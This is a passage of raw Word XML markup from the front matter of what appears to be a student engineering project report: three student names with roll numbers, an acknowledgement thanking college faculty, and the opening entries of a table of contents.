          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>bdul Samad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                             </w:t>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 xml:space="preserve"> 1610217490</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="-333"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-333" w:firstLine="280" w:firstLineChars="100"/>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Mohammed Abdul Raqeeb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                              </w:t>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1610217490</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>35</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-333" w:firstLine="280" w:firstLineChars="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-333" w:firstLine="280" w:firstLineChars="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mohammed FasiUddin Arsalaan   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1610217490</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>41</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-333" w:firstLine="280" w:firstLineChars="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="200" w:firstLineChars="50"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="315884"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="0" w:num="1"/>
          <w:rtlGutter w:val="0"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ACKNOWLEDGEMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>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satisfaction that accomplished completion of any task would be incomplete without the mention of people who made it possible and whose encouragement and guidance has been a source of inspiration through the source of the project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>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We express our profound sense of gratitude to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Dr. Syed Abdul Sattar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Principal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for his constant support. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>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We would like to express our sincere thank to our Project Supervisor, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr. Mohammad Sanaullah Qaseem, Professor of CSE, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>for sharing his experience and valuable knowledge to enhance our real time learning experience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>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auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We would like to express our sincere thanks to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Dr. Ch. Ramesh, HOD CSE (IOT) Dept</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and our Internal Guide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Mr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>. M. K. Ift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>equar Ali Khan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, Assistant Professor,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for their earnest efforts and timely suggestion and that motivated us to come out with satisfactory project work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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          We thank everybody who directly or indirectly played a vital role in finishing our project work with less difficulty.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Abdul Samad                                                                            161021749020</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Mohammed Abdul Raqeeb                                                     161021749035</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="315884"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="0" w:num="1"/>
          <w:rtlGutter w:val="0"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Mohammed FasiUddin Arsalaan                                           161021749041</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="200" w:firstLineChars="50"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="315884"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="315884"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365FA4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>……………………………………………………1</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1.1 Backgroun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>d………………………………………………………….…….….…….1</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1.2 Problem Statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………………………….…..………..1</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1.3 Objectives</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>…………………………………………………………………...………2</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1.4 Scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>……………………………………………………………………….…….…4</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1.5 Methodology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>………………………………………………………..………………5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="365F91"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
